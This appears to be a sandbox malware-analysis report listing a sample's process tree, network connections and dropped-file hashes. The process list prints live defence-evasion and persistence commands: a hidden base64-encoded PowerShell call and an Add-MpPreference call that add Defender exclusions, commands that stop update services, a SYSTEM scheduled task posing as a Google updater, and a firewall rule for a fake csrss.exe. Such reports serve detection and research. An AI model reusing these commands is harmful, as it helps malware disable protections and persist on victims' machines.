C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8co344Py.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8co344Py.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9ht5PK8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9ht5PK8.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe b61d0738e9711aff8472b530f28c712b ZyYqiaRnmEW78rJDxU0Mlw.0.1.0.0.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7364 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\B169.exe

C:\Users\Admin\AppData\Local\Temp\B169.exe

C:\Users\Admin\AppData\Local\Temp\B283.exe

C:\Users\Admin\AppData\Local\Temp\B283.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6052 -ip 6052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 784

C:\Users\Admin\AppData\Local\Temp\DA7F.exe

C:\Users\Admin\AppData\Local\Temp\DA7F.exe

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\DF91.exe

C:\Users\Admin\AppData\Local\Temp\DF91.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4804 /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\C9A4.exe

C:\Users\Admin\AppData\Local\Temp\C9A4.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 www.paypal.com udp
US 157.240.5.35:443 www.facebook.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 151.101.1.21:443 www.paypal.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 store.steampowered.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 3.210.187.106:443 www.epicgames.com tcp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 98.49.222.23.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 106.187.210.3.in-addr.arpa udp
US 8.8.8.8:53 83.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 54.205.234.65:443 tracking.epicgames.com tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 103.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 65.234.205.54.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 120.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
US 8.8.8.8:53 90.219.19.104.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 254.177.238.8.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.22:443 i.ytimg.com tcp
US 8.8.8.8:53 22.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 numpersb.fun udp
US 8.8.8.8:53 killredls.pw udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 57.53.21.104.in-addr.arpa udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 133.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 169.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 api.hcaptcha.com udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
RU 5.42.92.51:19057 tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 facebook.com udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 c.paypal.com udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
NL 172.217.168.227:443 www.recaptcha.net udp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 pbs.twimg.com udp
NL 199.232.148.159:443 pbs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 104.244.42.197:443 t.co tcp
US 104.244.42.66:443 api.twitter.com tcp
NL 199.232.148.158:443 video.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 197.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 66.42.244.104.in-addr.arpa udp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 c6.paypal.com udp
US 192.229.221.25:443 c6.paypal.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 login.steampowered.com udp
NL 23.222.49.98:443 login.steampowered.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 8.8.8.8:53 api.steampowered.com udp
NL 194.169.175.118:80 194.169.175.118 tcp
NL 23.222.49.98:443 api.steampowered.com tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 104.244.42.66:443 api.twitter.com tcp
US 104.244.42.66:443 api.twitter.com tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 185.174.136.219:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.34:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 34.36.251.142.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 194.49.94.11:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

MD5 21dcfc77dd0fa7e37e6cbc91414d0032
SHA1 f6571261d908df9c039032475c8ffd0a20c425b4
SHA256 21fcafb01ee1c93836a0235caa62a778c0815ded2bec7db7c7bcba2a2f55449f
SHA512 49e657efe14a5d75bff0ae3bf1170a9665d859ce7859623e6be03fcd042de728c6d169267a97fe77c4c6703148119a767a744ca88afe16b5f33e44c171165208

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

MD5 21dcfc77dd0fa7e37e6cbc91414d0032
SHA1 f6571261d908df9c039032475c8ffd0a20c425b4
SHA256 21fcafb01ee1c93836a0235caa62a778c0815ded2bec7db7c7bcba2a2f55449f
SHA512 49e657efe14a5d75bff0ae3bf1170a9665d859ce7859623e6be03fcd042de728c6d169267a97fe77c4c6703148119a767a744ca88afe16b5f33e44c171165208

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

MD5 9c92ba2621200fd09f7d42344923306a
SHA1 f53b41f16e33642eb227548e3bf1486d784cce15
SHA256 ebc2cc7b0c8d15b624cee5354dd58063a8ded19a18cb42f228320614b951b9bb
SHA512 9320845791738c2093f5916f33b9a22f998969e5acade932971bd0d6fb21505c13963b1cc8021970c98ab9b41c6dfac2a27929ef31eb95b0b042da03efaf2c26

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

MD5 9c92ba2621200fd09f7d42344923306a
SHA1 f53b41f16e33642eb227548e3bf1486d784cce15
SHA256 ebc2cc7b0c8d15b624cee5354dd58063a8ded19a18cb42f228320614b951b9bb
SHA512 9320845791738c2093f5916f33b9a22f998969e5acade932971bd0d6fb21505c13963b1cc8021970c98ab9b41c6dfac2a27929ef31eb95b0b042da03efaf2c26

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe

MD5 4568f68c13c5acd0afe9d6d912083338
SHA1 58ecfe3fc150ab45c1ef7bea1295a16fd49e6ad5
SHA256 5ebf969d601d6bc7fad6de4755b139301020cd95d35c802be15a758a068d3eef
SHA512 6897f0950faeee7b8e2a31d914a42e8fa059cfd85b80697163105700165f0af219f63d13a53c444f9f7ed63731bc70096b9adf6ba04e485cdf3ec9fd7cf5ff8b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe

MD5 4568f68c13c5acd0afe9d6d912083338
SHA1 58ecfe3fc150ab45c1ef7bea1295a16fd49e6ad5
SHA256 5ebf969d601d6bc7fad6de4755b139301020cd95d35c802be15a758a068d3eef
SHA512 6897f0950faeee7b8e2a31d914a42e8fa059cfd85b80697163105700165f0af219f63d13a53c444f9f7ed63731bc70096b9adf6ba04e485cdf3ec9fd7cf5ff8b

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe

MD5 bbe108b47026f8287dd60dd4db408786
SHA1 dd66586cdfdcf12e75999ea1223f251a47515c4d
SHA256 633cbcfb21e77fa0f92694df17f4c155fa94f107cb458f0f840ba5a5048f6ca8
SHA512 aa114a91a9973d9b68c4ca747fb39a93e809f54a61cad2872153c80964f8184eb70603ca739a249ced439d2bfc32d06d77b9b75e67af59be592e50fdb95cfa58

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe

MD5 bbe108b47026f8287dd60dd4db408786
SHA1 dd66586cdfdcf12e75999ea1223f251a47515c4d
SHA256 633cbcfb21e77fa0f92694df17f4c155fa94f107cb458f0f840ba5a5048f6ca8
SHA512 aa114a91a9973d9b68c4ca747fb39a93e809f54a61cad2872153c80964f8184eb70603ca739a249ced439d2bfc32d06d77b9b75e67af59be592e50fdb95cfa58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
